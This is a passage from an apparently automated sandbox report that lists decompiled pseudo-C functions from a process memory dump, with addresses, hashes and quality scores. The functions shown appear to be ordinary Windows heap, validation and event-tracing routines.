					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E00FC7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01027016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x00fab1e8
0x00fab1ea
0x00fab1f3
0x01004a17
0x00fab1f9
0x00fab1f9
0x00fab1f9
0x00fab201
0x01004a21
0x01004a2e
0x00000000
0x00000000
0x01004a3b
0x01004a4d
0x01004a3d
0x01004a46
0x01004a46
0x01004a55
0x00000000
0x00000000
0x00000000
0x00fab20a
0x00fab20a
0x00fab20a
0x00fab20a

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 59773816b1690c77a606f377fba5931e98aec6c481fe24ab123ad07f8e4af18d
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 5C01D1726006809BE323976DC904F697BD8EF82750F0800A2FA55CB6B3D778CC40E628

Uniqueness

Uniqueness Score: -1.00%

Function 0103FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0103FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x109d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E00FC7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0103fe96
0x0103fe9e
0x0103fea1
0x0103fead
0x0103feb3
0x0103feb9
0x0103fec3
0x0103fed5
0x0103fec5
0x0103fece
0x0103fece
0x0103fee0
0x0103fee1
0x0103fee3
0x0103fee8
0x0103fefb

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f33117fff85e7b06476782ea374493b04f7e34420f018ca0ebc25e7945ccff0d
Instruction ID: c1e323da11349205b464e66b4440084d5b90a85003414579e95bc39eed2a9a5a
Opcode Fuzzy Hash: f33117fff85e7b06476782ea374493b04f7e34420f018ca0ebc25e7945ccff0d
Instruction Fuzzy Hash: 7A016270E04249AFCB14DFA8D942A6EB7F4FF04700F1041A9B955DB382D639D901CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0106131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0106131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x109d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E00FC7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0106131b
0x0106132a
0x01061330
0x01061336
0x0106133e
0x01061341
0x01061344
0x0106134f
0x01061361
0x01061351
0x0106135a
0x0106135a
0x0106136c
0x0106136d
0x0106136f
0x01061374
0x01061387

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ca37a8d9ce894703abff8b79237e2cf5f2ef56fe19fb98bf79797be907d6beb
Instruction ID: 7ddb01155082b36ec768dc93ce1b2bfdd7dcc95939190e70a7241ec2547cd840
Opcode Fuzzy Hash: 6ca37a8d9ce894703abff8b79237e2cf5f2ef56fe19fb98bf79797be907d6beb
Instruction Fuzzy Hash: B4013171A05258AFCB44EFA9D946AAEB7F4FF48700F408059B945EB341E674DA00DB94

Uniqueness

Uniqueness Score: -1.00%

Function 01078F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E01078F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x109d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E00FC7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x01078f6a
0x01078f79
0x01078f81
0x01078f84
0x01078f8b
0x01078f91
0x01078f94
0x01078f9e
0x01078fb0
0x01078fa0
0x01078fa9
0x01078fa9
0x01078fbb
0x01078fbc
0x01078fbe
0x01078fc3
0x01078fd6

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02884093323d8300f50ae660d6f1e4f0109dd781ee04f6b1bb01eb97dbc20e3d
Instruction ID: 32f8f4b6bd8f6d268ea3fc31189ec380c640980bd25d6a6fd5258c4a574696e3
Opcode Fuzzy Hash: 02884093323d8300f50ae660d6f1e4f0109dd781ee04f6b1bb01eb97dbc20e3d
Instruction Fuzzy Hash: 01013674D04249AFDB00EFB9D946A5EB7F4FF08300F508059B945EB341D678DA00DB54

Uniqueness

Uniqueness Score: -1.00%

Function 01061608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01061608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x109d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E00FC7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x01061608
0x01061617
0x0106161d
0x01061625
0x01061628
0x0106162b
0x01061636
0x01061648
0x01061638
0x01061641
0x01061641
0x01061653
0x01061654
0x01061656
0x0106165b
0x0106166e

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4051672c57f1e9036284ce46bea9ac90b4d713e065c2dc7ba272a8cda3d48b9
Instruction ID: 84efd0124f350e2f74eaa2673247dbc39c09f47d40d32f0e5d5bb4c6fa7ac96c
Opcode Fuzzy Hash: d4051672c57f1e9036284ce46bea9ac90b4d713e065c2dc7ba272a8cda3d48b9
Instruction Fuzzy Hash: 75F04471A04248AFDB14EFA9D906A6EB7F4AF48300F448059B945DB291D6349900DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00FCC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FCC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E00FCC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xf811cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E010788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x00fcc577
0x00fcc57d
0x00fcc581
0x00fcc5b5
0x00fcc5b9
0x00fcc5ce
0x00fcc5ce
0x00fcc5ca
0x00000000
0x00fcc5ca
0x00fcc5c4
0x00fcc5c8
0x00000000
0x00000000
0x00000000
0x00fcc5ad
0x00000000
0x00fcc5af

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e21e7b8fbf4fb8684166e66e0fa117583cee163fa51e71e60c5b19e9893f1a
Instruction ID: f5c47bdce09ffeada4192a361d42189cdfb6b39a490da9a7c1fc5e291400ff94
Opcode Fuzzy Hash: b0e21e7b8fbf4fb8684166e66e0fa117583cee163fa51e71e60c5b19e9893f1a
Instruction Fuzzy Hash: 5FF0F0B3D116928ED73183148216F217BD89B08370F6C8C6FD50D83105C2A4FC80E2C0

Uniqueness

Uniqueness Score: -1.00%

Function 01062073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01062073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0105FD22(__ecx);
				_t19 =  *0x109849c - _t3; // 0xd50356e
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1098748; // 0x0
					if(__eflags <= 0) {
						E01061C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1098724 & 0x00000004;
							if(( *0x1098724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1098724; // 0x0
					return E01058DF1(__ebx, 0xc0000374, 0x1095890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x01062076
0x01062078
0x0106207d
0x01062083
0x010620a4
0x010620aa
0x010620ac
0x010620b7
0x010620ba
0x010620bc
0x010620c9
0x010620c9
0x010620d0
0x010620d2
0x00000000
0x010620d2
0x010620be
0x010620c3
0x010620c5
0x010620c7
0x00000000
0x00000000
0x010620c7
0x010620bc
0x010620d4
0x01062085
0x01062085
0x010620a3
0x010620a3

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce67ba1a60116c4cc8d8b81d9cad68cc929a489aa3a7413079f9f1f0811fb103
Instruction ID: e0eff70530afe81e3e85372792f3599a072dabd7c51033e5eb449bf9e73192a6
Opcode Fuzzy Hash: ce67ba1a60116c4cc8d8b81d9cad68cc929a489aa3a7413079f9f1f0811fb103
Instruction Fuzzy Hash: 6DF0A73A4151894AEFB36B6965212E67BDAFB5A150B0944C7E9E01730BC93A8893CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00FE927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00FE927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L00FC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E00FEFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E00FE92C6(_t11, _t14);
				}
				return _t11;
			}

0x00fe9295
0x00fe9299
0x00fe929f
0x00fe92aa
0x00fe92ad
0x00fe92ae
0x00fe92af
0x00fe92b0
0x00fe92b4
0x00fe92bb
0x00fe92bb
0x00fe92c5

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 5a0aeb57219affe32cfc77fdd44a811516f08e87369732f49b977894dccb13d1
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 47E09B723405406BDB219E56DC85F57776DDFC2B21F05407DB5045E243C6E9DD0997A0

Uniqueness

Uniqueness Score: -1.00%

Function 01078D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E01078D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x109d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E00FC7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x01078d34
0x01078d43
0x01078d4b
0x01078d4e
0x01078d52
0x01078d5c
0x01078d6e
0x01078d5e
0x01078d67
0x01078d67
0x01078d79
0x01078d7a
0x01078d7c
0x01078d81
0x01078d94

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c98363e0738771f2a590c5b83e9a968e257bde56fa060a2d08553daf4ddf1349
Instruction ID: b530e567ab4c0fb76cd057caa6a257fc8eac966b015559d83f5d78c866261252
Opcode Fuzzy Hash: c98363e0738771f2a590c5b83e9a968e257bde56fa060a2d08553daf4ddf1349
Instruction Fuzzy Hash: B3F09070E04648AFDB14EBA9D946A6E77B4AF08700F508099F906AB281EA38D9008B54

Uniqueness

Uniqueness Score: -1.00%

Function 01078B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01078B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x109d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E00FC7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01078b67
0x01078b6f
0x01078b72
0x01078b7d
0x01078b8f
0x01078b7f
0x01078b88
0x01078b88
0x01078b9a
0x01078b9b
0x01078b9d
0x01078ba2
0x01078bb5

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43663605a7da216a141bd54b6e4cb517812c0e064146cbfe0d23ff6f3e24e7ca
Instruction ID: 3d338b5e36ea830ecb5b72e66bc3e2865e66613f5976faff5414edf0584cd8a8
Opcode Fuzzy Hash: 43663605a7da216a141bd54b6e4cb517812c0e064146cbfe0d23ff6f3e24e7ca
Instruction Fuzzy Hash: BAF089B0A04259ABDB10EBA9D907E7E77B4FF04700F444499BA05DB381EA78D900C798

Uniqueness

Uniqueness Score: -1.00%

Function 00FC746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00FC746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E00FBEB70(__ecx, 0x10979a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E00FE95D0();
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x00fc746d
0x00fc746d
0x00fc746d
0x00fc7471
0x00fc7488
0x0100f92d
0x00fc748e
0x00fc7491
0x00fc7495
0x0100f937
0x0100f93a
0x0100f94e
0x0100f953
0x0100f956
0x0100f956
0x00fc7495
0x00000000
0x00fc7488
0x00fc7473
0x00fc7478
0x00fc747d
0x00fc7481
0x00000000
0x00fc7481
0x00fc747d
0x00fc747a
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231fa94594f16cae34d6cc0205eae536cdf6dacebc4dba6768ba4323fd89943a
Instruction ID: f6e0ed66411fdc833d9e6aef642aed598ec76de761bedb9c0c772b7d97fd2f13
Opcode Fuzzy Hash: 231fa94594f16cae34d6cc0205eae536cdf6dacebc4dba6768ba4323fd89943a
Instruction Fuzzy Hash: 16F0B435908346EADF1AF768CA42F79BBA2AF04320F14015DE491AB161E7689C00FF85

Uniqueness

Uniqueness Score: -1.00%

Function 01078CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01078CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x109d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E00FC7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00FEB640(E00FE9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01078ce5
0x01078ced
0x01078cf0
0x01078cfb
0x01078d0d
0x01078cfd
0x01078d06
0x01078d06
0x01078d18
0x01078d19
0x01078d1b
0x01078d20
0x01078d33

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a7cd334200990129285dc0303c423ff85d9cb19d5c2ab46c9d84d8916f4f8ca
Instruction ID: a88cfccac1c28ac96ba914f00732e416b1adf2f0d05567a13acf59c30c535e38
Opcode Fuzzy Hash: 6a7cd334200990129285dc0303c423ff85d9cb19d5c2ab46c9d84d8916f4f8ca
Instruction Fuzzy Hash: FAF08270E04249ABDB04EBA9D95AE6E77B4EF08300F50419AF956EB281EA38DD00D758

Uniqueness

Uniqueness Score: -1.00%

Function 00FA4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FA4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E010788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E00FCC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0xf81030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x00fa4f2e
0x00fa4f34
0x00fa4f38
0x01000b85
0x01000b85
0x01000b89
0x01000b9a
0x01000b9a
0x01000b9f
0x00000000
0x01000b9f
0x01000b94
0x01000b98
0x00000000
0x00000000
0x00000000
0x01000b98
0x00fa4f3e
0x00fa4f48
0x00000000
0x00fa4f6e
0x00000000
0x00fa4f70

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59db0bf2120312a6e41323ce0b3da3f1e7cfaf0e3d806fde3a2e5cfe8ba1af8a
Instruction ID: 3a4e80ebceb93d7fef3b84b70b290a093aea2e90738c74226258cebef68e731b
Opcode Fuzzy Hash: 59db0bf2120312a6e41323ce0b3da3f1e7cfaf0e3d806fde3a2e5cfe8ba1af8a
Instruction Fuzzy Hash: 3FF0B432511E848FE7B3DB1CC544B2277D8AB007B4F1495A5E58587556CB64E840C740

Uniqueness

Uniqueness Score: -1.00%

Function 00FDA44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FDA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1097b9c; // 0x0
				_t15 = __ecx;
				_t16 = L00FC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E00FEFA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x00fda44b
0x00fda453
0x00fda472
0x00fda476
0x00000000
0x00fda493
0x00fda47a
0x00fda47f
0x00fda486
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ea42d68b22c52510fa2e79f3b0f0c32772ef6606137327f2cd9ab4be7fd38bd
Instruction ID: 4d3af959acbdc38f4c3f6f9238091c54f6c86e6ea00a8562f7309a7a000abb4e
Opcode Fuzzy Hash: 7ea42d68b22c52510fa2e79f3b0f0c32772ef6606137327f2cd9ab4be7fd38bd
Instruction Fuzzy Hash: 07E09273A01421ABD2219A18EC01F66B3AEEBD5B51F1A4039F644C7224D66CDD01E7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00FAF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00FAF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E00FDF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L00FC4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x00faf35d
0x00faf361
0x00faf367
0x00faf372
0x00faf38c
0x00faf38c
0x00faf394

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: faf445aff5e017ed6d1fa06d77a279e25415d1c32d3a1397c4619cff312eeb5d
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: DFE0D872A40218BBCB3196D99E06F5AFBBDDB45B60F0501A5B904DB150D565AD00E2D0

Uniqueness

Uniqueness Score: -1.00%

Function 00FBFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FBFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0xf811a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E010788F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E00FC0050(_t14);
				}
			}

0x00fbff66
0x00fbff6b
0x00000000
0x00fbff8f
0x00000000
0x00fbff8f

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e41b5e95b96acb32503d3534d430c7b59d67b9cd5077ed0fe58753519773071
Instruction ID: fe476af408bbc43d717da55aab07de549c9c1d51dbaddf422ffb3e8b9d683921
Opcode Fuzzy Hash: 0e41b5e95b96acb32503d3534d430c7b59d67b9cd5077ed0fe58753519773071
Instruction Fuzzy Hash: ABE09AB1A052049ED734DB52D984FB5379CEB62731F1AC22EE0084B102C621DC85EA0A

Uniqueness

Uniqueness Score: -1.00%

Function 010341E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E010341E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x10808f0);
				_t5 = E00FFD08C(__ebx, __edi, __esi);
				if( *0x10987ec == 0) {
					E00FBEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x10987ec == 0) {
						 *0x10987f0 = 0x10987ec;
						 *0x10987ec = 0x10987ec;
						 *0x10987e8 = 0x10987e4;
						 *0x10987e4 = 0x10987e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01034248();
				}
				return E00FFD0D1(_t5);
			}

0x010341e8
0x010341ea
0x010341ef
0x010341fb
0x01034206
0x0103420b
0x01034216
0x0103421d
0x01034222
0x0103422c
0x01034231
0x01034231
0x01034236
0x0103423d
0x0103423d
0x01034247

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94fae4e4553d06a3e3516ac427407b8dbb3bd823023ee3fb9421ffcd6a8a26fb
Instruction ID: 3f77991902b79f2d6e47b327901c7e22eace306b338262bae2ab9b34f49d171b
Opcode Fuzzy Hash: 94fae4e4553d06a3e3516ac427407b8dbb3bd823023ee3fb9421ffcd6a8a26fb
Instruction Fuzzy Hash: FCF01C74410708DECBB0EF69D52175CB6A4F786310F40819B91C49B3AADB3D8494DF01

Uniqueness

Uniqueness Score: -1.00%

Function 0105D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0105D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L00FAE8B0(__ecx, _a4, 0xfff);
					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0105d38a
0x0105d39b
0x0105d3b1
0x00000000
0x0105d3b6
0x00000000

Memory Dump Source

